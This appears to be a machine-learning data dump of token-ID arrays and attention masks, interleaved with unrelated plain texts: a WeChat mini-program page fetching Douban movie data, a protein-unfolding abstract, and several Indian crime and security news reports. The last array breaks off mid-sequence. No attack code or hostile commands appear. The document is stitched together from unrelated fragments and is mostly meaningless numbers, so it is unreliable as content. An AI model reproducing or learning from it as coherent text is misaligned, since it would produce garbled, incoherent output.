1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Page({ data: { film: {}, showLoading: true, options: null }, onLoad: function (options) { var that = this wx.setNavigationBarTitle({ title: options.title }) wx.request({ url: 'https://api.douban.com/v2/movie/subject/' + options.id, header: { 'content-type': 'json' }, success: function (res) { var data = res.data that.setData({ film: data, showLoading: false }) } }) } })
[ 1, 9305, 3319, 13, 29871, 848, 29901, 426, 13, 1678, 2706, 29901, 24335, 13, 1678, 1510, 23456, 29901, 1565, 29892, 13, 1678, 3987, 29901, 1870, 13, 29871, 2981, 13, 29871, 373, 5896, 29901, 740, 313, 6768, 29897, 426, 13, 1678, 722, 393, 353, 445, 13, 1678, 26437, 29889, 842, 20245, 4297, 7030, 3319, 13, 418, 3611, 29901, 3987, 29889, 3257, 13, 1678, 5615, 13, 1678, 26437, 29889, 3827, 3319, 13, 418, 3142, 29901, 525, 991, 597, 2754, 29889, 29881, 283, 2571, 29889, 510, 29914, 29894, 29906, 29914, 27362, 29914, 16009, 22208, 718, 3987, 29889, 333, 29892, 13, 418, 4839, 29901, 426, 13, 4706, 525, 3051, 29899, 1853, 2396, 525, 3126, 29915, 13, 418, 2981, 13, 418, 2551, 29901, 740, 313, 690, 29897, 426, 13, 4706, 722, 848, 353, 620, 29889, 1272, 13, 4706, 393, 29889, 842, 1469, 3319, 13, 3986, 2706, 29901, 848, 29892, 13, 3986, 1510, 23456, 29901, 2089, 13, 4706, 5615, 13, 418, 500, 13, 1678, 5615, 13, 29871, 500, 13, 1800, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The unfolding of trp aporepressor as a function of pH: evidence for an unfolding intermediate. The urea-induced unfolding of trp aporepressor from Escherichia coli has been studied as a function of pH from 2.5 to 12.0 at 25 degrees C. At pH 7 and above, the unfolding transition, as monitored by changes in the fluorescence intensity at 360 nm, shows a single transition. At low pH, the transition again appears to be a single transition. In the range of 3.5-6.0, the transition is biphasic, indicating the existence of a folding intermediate. The transitions have also been studied using circular dichroism and size exclusion chromatography. The data were fitted by a model in which the dimeric protein first unfolds to form structured monomers, followed by the unfolding of the monomers. From fits with this "folded monomers" model, the free energy change for the dimer<-->monomer dissociation becomes less positive as pH is decreased; the free energy change for the unfolding of the monomers is essentially independent of pH. An alternate model is one in which the dimer first undergoes a transition to a partially unfolded dimeric state, with this intermediate then denaturing to unfolded monomers. Both models give adequate fits to the data obtained at a single protein concentration. From a study of the concentration dependence of the urea-induced unfolding at pH 5, the "folded monomers" model is found to be more consistent with the data. Size exclusion chromatography data support the description of the intermediate state, which is the most populated state at low pH in the absence of urea, as being a relatively compact monomer.(ABSTRACT TRUNCATED AT 250 WORDS)
[ 1, 450, 20220, 292, 310, 534, 29886, 3095, 487, 2139, 272, 408, 263, 740, 310, 282, 29950, 29901, 10757, 363, 385, 20220, 292, 19697, 29889, 13, 1576, 318, 5638, 29899, 19910, 1133, 20220, 292, 310, 534, 29886, 3095, 487, 2139, 272, 515, 382, 19996, 436, 423, 784, 29875, 756, 1063, 12399, 408, 263, 740, 310, 282, 29950, 515, 29871, 29906, 29889, 29945, 304, 29871, 29896, 29906, 29889, 29900, 472, 29871, 29906, 29945, 14496, 315, 29889, 2180, 282, 29950, 29871, 29955, 322, 2038, 29892, 278, 20220, 292, 9558, 29892, 408, 11819, 287, 491, 3620, 297, 278, 20501, 2361, 29883, 663, 26171, 472, 29871, 29941, 29953, 29900, 302, 29885, 29892, 3697, 263, 2323, 9558, 29889, 2180, 4482, 282, 29950, 29892, 278, 9558, 1449, 5692, 304, 367, 263, 2323, 9558, 29889, 512, 278, 3464, 310, 29871, 29941, 29889, 29945, 29899, 29953, 29889, 29900, 29892, 278, 9558, 338, 4768, 16130, 293, 29892, 23941, 278, 10379, 310, 263, 900, 8497, 19697, 29889, 450, 1301, 2187, 505, 884, 1063, 12399, 773, 19308, 12658, 307, 1608, 322, 2159, 429, 10085, 25173, 271, 5275, 29889, 450, 848, 892, 25890, 491, 263, 1904, 297, 607, 278, 3964, 261, 293, 26823, 937, 29395, 3361, 304, 883, 2281, 2955, 1601, 290, 414, 29892, 5643, 491, 278, 20220, 292, 310, 278, 1601, 290, 414, 29889, 3645, 23994, 411, 445, 376, 8771, 287, 1601, 290, 414, 29908, 1904, 29892, 278, 3889, 5864, 1735, 363, 278, 3964, 261, 29966, 15110, 3712, 12392, 766, 2839, 362, 7415, 3109, 6374, 408, 282, 29950, 338, 9263, 1463, 29936, 278, 3889, 5864, 1735, 363, 278, 20220, 292, 310, 278, 1601, 290, 414, 338, 13674, 7417, 310, 282, 29950, 29889, 530, 25010, 1904, 338, 697, 297, 607, 278, 3964, 261, 937, 1090, 1484, 267, 263, 9558, 304, 263, 22039, 20220, 287, 3964, 261, 293, 2106, 29892, 411, 445, 19697, 769, 972, 19021, 304, 20220, 287, 1601, 290, 414, 29889, 9134, 4733, 2367, 19967, 339, 403, 23994, 304, 278, 848, 7625, 472, 263, 2323, 26823, 26702, 29889, 3645, 263, 6559, 310, 278, 26702, 26307, 310, 278, 318, 5638, 29899, 19910, 1133, 20220, 292, 472, 282, 29950, 29871, 29945, 29892, 278, 376, 8771, 287, 1601, 290, 414, 29908, 1904, 338, 1476, 304, 367, 901, 13747, 411, 278, 848, 29889, 21179, 429, 10085, 25173, 271, 5275, 848, 2304, 278, 6139, 310, 278, 19697, 2106, 29892, 607, 338, 278, 1556, 24146, 2106, 472, 4482, 282, 29950, 297, 278, 18070, 310, 318, 5638, 29892, 408, 1641, 263, 13774, 11071, 1601, 12392, 14030, 2882, 1254, 4717, 1783, 10014, 3904, 29907, 3040, 29928, 15531, 29871, 29906, 29945, 29900, 399, 1955, 8452, 29897 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
The Tamil Nadu police on Friday arrested 33 crew members of an American ship detained last week for illegally entering Indian waters with a huge cache of arms and ammunition. Earlier reports said all 35 members on board were arrested, but a press release issued by the office of the Tamil Nadu director-general of police said “two crew members were left for upkeep and maintenance of the vessel, till the company makes alternative arrangements for the ship’s maintenance”. The MV Seaman Guard Ohio, an armed ship operated by a US maritime security company AdvanFort, was detained last Friday with 35 people on board by the Coast Guard east of Tuticorin, around 600 km south of Chennai, for failing to produce papers authorising it to carry weapons and ammunition in Indian waters. According to the press note, the ‘Q’ Branch CID of the police arrested eight crew members and 25 guards on Friday morning, leaving two crew members for upkeep and maintenance of the vessel. The release stated that a case was registered in Tharuvaikulam Marine police station against the crew members and guards on board the vessel on the complaint of the assistant commandant of Indian Coast Guard, Tuticorin, on October 13. The complaint included offences under the Arms Act, 1959, Essential Commodities Act, 1955, and Motor Spirit and High Speed Diesel (prevention of malpractices in supply and distribution order), 1990. It said investigation by the ‘Q’ Branch CID of the police revealed that the said vessel was found in the territorial waters of our country and was in possession of a huge quantity of arms and ammunition without valid authorisation of documents. Further, the said vessel has drawn illegally about 1,500 litres of diesel from private sources in our land without following the procedure. During the course of investigation, the release added, the ‘Q’ Branch CID has seized 35 arms and about 5,680 ammunitions from the vessel. Further investigations are on, the police said. The state government on Friday said the arrested seamen were produced before a magistrate court in Tuticorin and remanded in custody. The Central and state police are investigating the case, police officials said, adding that the state has taken the case seriously and has refused to set the sailors free. Earlier, Coast Guard Commandant Anand Kumar said the ship was stopped on October 11 and was being held in the southern port of Tuticorin along with its 10 crew and 25 armed security guards until required documentation is submitted. The crew and security guards included British, Estonian, Indian and Ukrainian nationals, Kumar said. Eight out of them were Indians. The southern tip of India is close to major trading routes from Asia to Europe. Many cargo ships now travel with armed guards to deter pirates. Sri Lanka, close to Tuticorin, is a popular boarding point for private armed guards. The ship was reportedly in Indian waters for three days before it was detected. According to the police, the crew broke several Indian laws and maintained no log of the arms on board. It was reportedly carrying 31 assault rifles and around 5,000 rounds of ammunition, which were seized by the Coast Guard. Deputy National Security Adviser Nehchal Sandhu had earlier said he did not think that the detained ship was involved in gunrunning. “I don’t think so.” He added that it is likely to be owned by a private maritime security company. Some media reports have said a US-based anti-piracy company owns it. AdvanFort claims the ship entered the Indian waters to escape the fury of cyclone Phailin, which made landfall on India’s eastern coast (near Gopalpur in Ganjam district of Odisha) on Saturday. The vessel, however, was detected far from where the cyclone hit Odisha and Andhra Pradesh last weekend. India is very sensitive about the presence of armed security guards on merchant ships after the shooting deaths of two fishermen by armed Italian marines last year in February. The marines were part of a military security team on a cargo ship when they fired at the fishermen, mistaking them for pirates. The Ernakulam Town North police have registered a case against People’s Democratic Party leader Abdul Nasir Maudany on the charge of planning the murder of Bharatheeya Vichara Kendram director P. Parameswaran and Father Alavi. The case was registered on Wednesday following an order by the District Additional Chief Judicial Magistrate Court on a petition by T.G. Mohandas, former general secretary of the kendram. Maudany, an accused in the 2008 Bangalore blasts case, allegedly hatched plans to murder Mr. Parameswaran and Father Alavi from his house at Kaloor here. Mr. Mohandas said in his petition that a statement accusing Maudany of the crime had been made in 1998 by a person named T.K. Muhammad before A.V. George, then Circle Inspector of the Kozhikode Town police. According to the statement, T.K. Muhammad told the police that Maudany had tried many times to get the two killed between 1996 and 1998. Maudany allegedly offered PDP member Muhammad Ashraf Rs.5,000 each for the killings. Ashraf allegedly told T.K. Muhammad that Maudany had promised to send him to Pakistan. Saturday’s action in Puttur in Chittoor district of Andhra Pradesh was an important breakthrough as sources in the Bangalore police claim that one of the two men – Ismail Panna was the man who planted bike with the bomb outside the BJP office in Malleswaram area in April this year. Sixteen people were injured in the blast and it created a sensation as it took place just days before the Karnataka Assembly elections. The second person Bilal Malik is suspected to be the brain behind the murder of BJP leader V. Ramesh in Salem in July this year. The police zeroed in on both of them after they nabbed Fakruddin of the Islamic Liberation Front on the Tamilnadu-Andhra Pradesh border and he reportedly spilled beans on the presence of Malik and Panna in Puttur. From a security angle, it was the first action that the OCTOPUS (Organisation for Counter Terrorist Operations), the elite anti-terror commando force of the Andhra Pradesh police, that was set up to take care of terrorist operations, handled. And handled successfully, given the challenge flushing out the two alleged terrorists who were using a woman and her three children as human shield posed. It turned out that they were Malik’s family. It was around 5:30 am on Saturday when the phone of the OCTOPUS chief rang in Hyderabad. It helped that in addition to the one team of OCTOPUS that is permanently stationed at Tirumala-Tirupati, another team too had been sent across ahead of the Brahmotsavam at Dussehra time. Within an hour, one of the teams consisting of 35 men had moved to the location. The initial foray into the area by the Tamil Nadu police had run into trouble, with one inspector stabbed by one of the men inside. By the time the OCTOPUS arrived, the local police had ensured cordoning off of the house. The Tamil Nadu police helped in communicating with the men, who spoke only in Tamil. “They were the ones to shout back and negotiate with them in Tamil,” said an officer. Once the commandos realised that they had to first get the woman and the three children out, they knew this was going to be a long operation that would mean tiring out the two men inside through prolonged negotiations. They were apprehensive that the children may get scared because of the gunshots. Seeing a cradle inside the house through a window confused them because if one of the children was an infant, it would complicate the operation. They were also unsure of the kind of ammunition the two men had with them. “If there was no one else, it would be a five-minute job. But with the possibility of an infant, we could not take any chances,” said an officer. The team said they are trained to take on armed terrorists so weapons with them wasn’t a concern. It was only the possibility of a hostage crisis that created doubts in the mind. The team had covered all possible exits, with expert snipers positioned at appropriate places. The intention was to capture, not to kill. Finally, the eleven hour long siege ended with the two men surrendering to the police. Their presence so close to the Tirumala temple set off alarm bells especially with the Brahmotsavams starting at the shrine coinciding with the Dussehra festival. Investigators will now try to probe the activities they indulged in during the six months they stayed in Puttur to find out if they were up to something or just using the time to cool their heels after the two acts in Bangalore and Salem. The whistleblower who blew the lid off the secret telephone exchange at the residence of Dayanidhi Maran connected with Sun TV, now credits 2G tainted former Union telecom minister A Raja with exposing it after the Marans were banished by DMK patriarch M Karunanidhi. “It was Raja who initiated the inquiry against the alleged allotment of 323 ISDN phone connections to former Union Telecom Minister Dayanidhi Maran after the Marans fell out with the DMK’s first family in 2007,” claimed C K Mathivanan, deputy general secretary of the National Federation of Telecom Employees (BSNL) Union. Mathivanan, who has been denied retirement benefits due to pending disciplinary proceedings for “gheraoing” the BSNL chief general manager’s office, said it was Raja who had ordered an inquiry against the Marans as there was a prima facie case. It was in 2007 that the CBI had submitted the report on the allotment of 323 ISDN phone connections. However, there was no progress once the family reunion took place. “Now, the CBI is taking action after six years,” said the trade union leader, who demanded that the name of Kalanidhi Maran, the Sun Network boss, be included in the FIR. “Kalanidhi Maran should also be booked as he is the sole beneficiary of the exchange scam,” he argued. “I was singled out. Whatever, I did was to safeguard the interest of BSNL,” he told Express. Meanwhile, the BSNL said it would provide retirement benefits to Mathivanan, only after the disciplinary procedures were completed.
[ 1, 450, 323, 1344, 405, 13467, 10974, 373, 28728, 24383, 29871, 29941, 29941, 17616, 5144, 310, 385, 3082, 7751, 1439, 7114, 1833, 4723, 363, 980, 1397, 635, 18055, 7560, 19922, 411, 263, 12176, 7090, 310, 10188, 322, 626, 24579, 654, 29889, 13, 13, 29923, 279, 4926, 13676, 1497, 599, 29871, 29941, 29945, 5144, 373, 7613, 892, 24383, 29892, 541, 263, 3965, 6507, 16610, 491, 278, 8034, 310, 278, 323, 1344, 405, 13467, 8881, 29899, 17492, 310, 10974, 1497, 1346, 10184, 17616, 5144, 892, 2175, 363, 701, 17462, 322, 25413, 310, 278, 21239, 29892, 3428, 278, 5001, 3732, 8671, 15196, 4110, 363, 278, 7751, 30010, 29879, 25413, 8643, 13, 13, 1576, 341, 29963, 922, 13533, 13211, 15821, 29892, 385, 23926, 7751, 19623, 491, 263, 3148, 1766, 21998, 6993, 5001, 2087, 3703, 29943, 441, 29892, 471, 1439, 7114, 1833, 28728, 411, 29871, 29941, 29945, 2305, 373, 7613, 491, 278, 17700, 13211, 9755, 310, 323, 329, 293, 272, 262, 29892, 2820, 29871, 29953, 29900, 29900, 2383, 7062, 310, 21589, 1056, 29875, 29892, 363, 17581, 304, 7738, 15055, 4148, 5921, 372, 304, 8677, 25340, 322, 626, 24579, 654, 297, 7560, 19922, 29889, 13, 13, 7504, 3278, 304, 278, 3965, 4443, 29892, 278, 5129, 29984, 30010, 25889, 315, 1367, 310, 278, 10974, 24383, 9475, 17616, 5144, 322, 29871, 29906, 29945, 1410, 3163, 373, 28728, 7250, 29892, 10124, 1023, 17616, 5144, 363, 701, 17462, 322, 25413, 310, 278, 21239, 29889, 13, 13, 1576, 6507, 8703, 393, 263, 1206, 471, 15443, 297, 498, 18071, 1564, 638, 352, 314, 15929, 10974, 5073, 2750, 278, 17616, 5144, 322, 1410, 3163, 373, 7613, 278, 21239, 373, 278, 15313, 524, 310, 278, 20255, 1899, 424, 310, 7560, 17700, 13211, 29892, 323, 329, 293, 272, 262, 29892, 373, 5533, 29871, 29896, 29941, 29889, 13, 13, 1576, 15313, 524, 5134, 1283, 2063, 1090, 278, 826, 1516, 3185, 29892, 29871, 29896, 29929, 29945, 29929, 29892, 11044, 2556, 422, 1545, 1907, 3185, 29892, 29871, 29896, 29929, 29945, 29945, 29892, 322, 16843, 20799, 322, 5057, 24839, 6065, 295, 313, 1457, 7316, 310, 4439, 29886, 1461, 1575, 297, 11421, 322, 4978, 1797, 511, 29871, 29896, 29929, 29929, 29900, 29889, 13, 13, 3112, 1497, 22522, 491, 278, 5129, 29984, 30010, 25889, 315, 1367, 310, 278, 10974, 17845, 393, 278, 1497, 21239, 471, 1476, 297, 278, 29740, 19922, 310, 1749, 4234, 322, 471, 297, 17715, 310, 263, 12176, 14728, 310, 10188, 322, 626, 24579, 654, 1728, 2854, 4148, 4371, 310, 10701, 29889, 8725, 29892, 278, 1497, 21239, 756, 12061, 980, 1397, 635, 1048, 29871, 29896, 29892, 29945, 29900, 29900, 11872, 690, 310, 2977, 295, 515, 2024, 8974, 297, 1749, 2982, 1728, 1494, 278, 8792, 29889, 13, 13, 29928, 3864, 278, 3236, 310, 22522, 29892, 278, 6507, 2715, 29892, 278, 5129, 29984, 30010, 25889, 315, 1367, 756, 25291, 29871, 29941, 29945, 10188, 322, 1048, 29871, 29945, 29892, 29953, 29947, 29900, 626, 24579, 2187, 515, 278, 21239, 29889, 8725, 7405, 800, 526, 373, 29892, 278, 10974, 1497, 29889, 13, 13, 1576, 2106, 5874, 373, 28728, 1497, 278, 24383, 409, 5071, 892, 7371, 1434, 263, 29102, 403, 8973, 297, 323, 329, 293, 272, 262, 322, 1083, 392, 287, 297, 25387, 1486, 29889, 450, 8068, 322, 2106, 10974, 526, 7405, 1218, 278, 1206, 29892, 10974, 24921, 1497, 29892, 4417, 393, 278, 2106, 756, 4586, 278, 1206, 25798, 322, 756, 15964, 304, 731, 278, 14892, 943, 3889, 29889, 13, 13, 29923, 279, 4926, 29892, 17700, 13211, 10516, 424, 530, 392, 476, 24540, 1497, 278, 7751, 471, 11084, 373, 5533, 29871, 29896, 29896, 322, 471, 1641, 4934, 297, 278, 14841, 2011, 310, 323, 329, 293, 272, 262, 3412, 411, 967, 29871, 29896, 29900, 17616, 322, 29871, 29906, 29945, 23926, 6993, 1410, 3163, 2745, 3734, 5106, 338, 18397, 29889, 13, 13, 1576, 17616, 322, 6993, 1410, 3163, 5134, 4908, 29892, 2661, 25813, 29892, 7560, 322, 29417, 713, 4797, 29879, 29892, 476, 24540, 1497, 29889, 382, 523, 714, 310, 963, 892, 17072, 29889, 450, 14841, 6872, 310, 7513, 338, 3802, 304, 4655, 3534, 292, 12049, 515, 14325, 304, 4092, 29889, 13, 13, 14804, 17040, 13968, 1286, 9850, 411, 23926, 1410, 3163, 304, 270, 1308, 21625, 1078, 29889, 24019, 365, 18330, 29892, 3802, 304, 323, 329, 293, 272, 262, 29892, 338, 263, 5972, 7613, 292, 1298, 363, 2024, 23926, 1410, 3163, 29889, 13, 13, 1576, 7751, 471, 8967, 368, 297, 7560, 19922, 363, 2211, 3841, 1434, 372, 471, 17809, 29889, 7579, 304, 278, 10974, 29892, 278, 17616, 14455, 3196, 7560, 14243, 322, 19949, 694, 1480, 310, 278, 10188, 373, 7613, 29889, 13, 13, 3112, 471, 8967, 368, 19436, 29871, 29941, 29896, 29159, 17018, 793, 322, 2820, 29871, 29945, 29892, 29900, 29900, 29900, 364, 3885, 310, 626, 24579, 654, 29892, 607, 892, 25291, 491, 278, 17700, 13211, 29889, 13, 13, 2772, 649, 29891, 3086, 14223, 2087, 1730, 261, 2448, 29882, 305, 284, 8564, 6905, 750, 8859, 1497, 540, 1258, 451, 1348, 393, 278, 1439, 7114, 7751, 471, 9701, 297, 13736, 21094, 29889, 13, 13, 30015, 29902, 1016, 30010, 29873, 1348, 577, 3178, 940, 2715, 393, 372, 338, 5517, 304, 367, 15205, 491, 263, 2024, 1766, 21998, 6993, 5001, 29889, 3834, 5745, 13676, 505, 1497, 263, 3148, 29899, 6707, 9418, 29899, 1631, 10068, 5001, 1914, 29879, 372, 29889, 13, 13, 3253, 3703, 29943, 441, 16726, 278, 7751, 7802, 278, 7560, 19922, 304, 10169, 278, 285, 2857, 310, 5094, 16513, 1963, 737, 262, 29892, 607, 1754, 2982, 11950, 373, 7513, 30010, 29879, 18632, 12180, 313, 28502, 402, 459, 284, 15503, 297, 28245, 29926, 314, 6474, 310, 6715, 728, 29874, 29897, 373, 24211, 29889, 450, 21239, 29892, 3138, 29892, 471, 17809, 2215, 515, 988, 278, 5094, 16513, 7124, 6715, 728, 29874, 322, 1126, 29882, 336, 1588, 21754, 1833, 4723, 355, 29889, 13, 13, 2568, 423, 338, 1407, 20502, 1048, 278, 10122, 310, 23926, 6993, 1410, 3163, 373, 29055, 13968, 1156, 278, 27904, 4892, 29879, 310, 1023, 9427, 837, 264, 491, 23926, 10545, 1766, 1475, 1833, 1629, 297, 6339, 29889, 450, 1766, 1475, 892, 760, 310, 263, 9121, 6993, 3815, 373, 263, 17040, 7751, 746, 896, 17285, 472, 278, 9427, 837, 264, 29892, 5862, 5086, 963, 363, 21625, 1078, 29889, 13, 13, 1576, 1425, 8546, 352, 314, 8421, 4644, 10974, 505, 15443, 263, 1206, 2750, 11647, 30010, 29879, 19083, 9173, 11822, 17860, 352, 22318, 381, 3219, 566, 1384, 373, 278, 8323, 310, 18987, 278, 13406, 310, 350, 8222, 271, 354, 1032, 29874, 478, 436, 2518, 476, 355, 2572, 8881, 349, 29889, 1459, 1280, 4495, 273, 322, 17852, 319, 433, 1403, 29889, 13, 13, 1576, 1206, 471, 15443, 373, 15050, 4515, 3250, 1494, 385, 1797, 491, 278, 7457, 3462, 3245, 14546, 8660, 5611, 3561, 2132, 403, 9245, 373, 263, 5697, 654, 491, 323, 29889, 29954, 29889, 12929, 7086, 29892, 4642, 2498, 28274, 310, 278, 413, 355, 2572, 29889, 13, 13, 29924, 15052, 1384, 29892, 385, 28886, 297, 278, 29871, 29906, 29900, 29900, 29947, 14320, 284, 487, 1999, 19416, 1206, 29892, 16831, 23244, 298, 905, 287, 13900, 304, 13406, 3237, 29889, 1459, 1280, 4495, 273, 322, 17852, 319, 433, 1403, 515, 670, 3699, 472, 476, 7003, 272, 1244, 29889, 3237, 29889, 12929, 7086, 1497, 297, 670, 5697, 654, 393, 263, 3229, 1035, 4746, 3219, 566, 1384, 310, 278, 17268, 750, 1063, 1754, 297, 29871, 29896, 29929, 29929, 29947, 491, 263, 2022, 4257, 323, 29889, 29968, 29889, 29610, 1434, 319, 29889, 29963, 29889, 5122, 29892, 769, 27927, 13377, 1103, 272, 310, 278, 476, 2112, 29882, 638, 356, 8421, 10974, 29889, 7579, 304, 278, 3229, 29892, 323, 29889, 29968, 29889, 29610, 5429, 278, 10974, 393, 3219, 566, 1384, 750, 1898, 1784, 3064, 304, 679, 278, 1023, 9445, 1546, 29871, 29896, 29929, 29929, 29953, 322, 29871, 29896, 29929, 29929, 29947, 29889, 3219, 566, 1384, 16831, 23244, 12520, 349, 11191, 4509, 29610, 12835, 1929, 390, 29879, 29889, 29945, 29892, 29900, 29900, 29900, 1269, 363, 278, 12088, 886, 29889, 12835, 1929, 16831, 23244, 5429, 323, 29889, 29968, 29889, 29610, 393, 3219, 566, 1384, 750, 22399, 304, 3638, 1075, 304, 21215, 29889, 13, 13, 29903, 20510, 30010, 29879, 3158, 297, 349, 4774, 332, 297, 678, 20435, 272, 6474, 310, 1126, 29882, 336, 1588, 21754, 471, 385, 4100, 2867, 20678, 408, 8974, 297, 278, 14320, 284, 487, 10974, 5995, 393, 697, 310, 278, 1023, 1757, 785, 1317, 2549, 349, 9713, 471, 278, 767, 1058, 8024, 287, 4768, 446, 411, 278, 13585, 5377, 278, 350, 29967, 29925, 8034, 297, 23809, 267, 4495, 314, 4038, 297, 3786, 445, 1629, 29889, 18372, 9404, 2305, 892, 28606, 297, 278, 1999, 579, 322, 372, 2825, 263, 4771, 362, 408, 372, 3614, 2058, 925, 3841, 1434, 278, 476, 2753, 532, 1335, 13266, 20209, 29889, 13, 13, 1576, 1473, 2022, 20347, 284, 3792, 638, 338, 2858, 6021, 304, 367, 278, 17294, 5742, 278, 13406, 310, 350, 29967, 29925, 11822, 478, 29889, 390, 1280, 29882, 297, 317, 12698, 297, 5468, 445, 1629, 29889, 450, 10974, 5225, 287, 297, 373, 1716, 310, 963, 1156, 896, 26924, 2580, 383, 557, 29878, 566, 24581, 310, 278, 16427, 293, 10895, 362, 13960, 373, 278, 323, 1344, 29876, 13467, 29899, 2855, 29882, 336, 1588, 21754, 5139, 322, 540, 8967, 368, 805, 24455, 367, 550, 373, 278, 10122, 310, 3792, 638, 322, 349, 9713, 297, 349, 4774, 332, 29889, 13, 13, 4591, 263, 6993, 10696, 29892, 372, 471, 278, 937, 3158, 393, 278, 438, 1783, 4590, 3308, 313, 27356, 4371, 363, 315, 5336, 323, 2704, 391, 6607, 800, 511, 278, 560, 568, 9418, 29899, 357, 729, 844, 1743, 4889, 310, 278, 1126, 29882, 336, 1588, 21754, 10974, 29892, 393, 471, 731, 701, 304, 2125, 2562, 310, 15115, 391, 6931, 29892, 16459, 29889, 1126, 16459, 8472, 29892, 2183, 278, 18766, 1652, 21616, 714, 278, 1023, 16831, 287, 15115, 2879, 1058, 892, 773, 263, 6114, 322, 902, 2211, 4344, 408, 5199, 28761, 926, 287, 29889, 739, 6077, 714, 393, 896, 892, 3792, 638, 30010, 29879, 3942, 29889, 13, 13, 3112, 471, 2820, 29871, 29945, 29901, 29941, 29900, 626, 373, 24211, 746, 278, 9008, 310, 278, 438, 1783, 4590, 3308, 9087, 19120, 297, 9665, 672, 20143, 29889, 739, 9213, 393, 297, 6124, 304, 278, 697, 3815, 310, 438, 1783, 4590, 3308, 393, 338, 9410, 2705, 5073, 287, 472, 27810, 398, 2883, 29899, 29911, 381, 786, 2219, 29892, 1790, 3815, 2086, 750, 1063, 2665, 4822, 14432, 310, 278, 5032, 7184, 1862, 25599, 472, 360, 375, 11734, 336, 931, 29889, 23732, 385, 7234, 29892, 697, 310, 278, 10907, 19849, 310, 29871, 29941, 29945, 1757, 750, 6153, 304, 278, 4423, 29889, 13, 13, 1576, 2847, 363, 388, 964, 278, 4038, 491, 278, 323, 1344, 405, 13467, 10974, 750, 1065, 964, 7458, 29892, 411, 697, 16096, 272, 380, 370, 2580, 491, 697, 310, 278, 1757, 2768, 29889, 2648, 278, 931, 278, 438, 1783, 4590, 3308, 11977, 29892, 278, 1887, 10974, 750, 5662, 2955, 13793, 28259, 1283, 310, 278, 3699, 29889, 450, 323, 1344, 405, 13467, 10974, 9213, 297, 7212, 1218, 411, 278, 1757, 29892, 1058, 12707, 871, 297, 323, 1344, 29889, 1346, 15597, 892, 278, 6743, 304, 21272, 1250, 322, 27214, 403, 411, 963, 297, 323, 1344, 3995, 1497, 385, 12139, 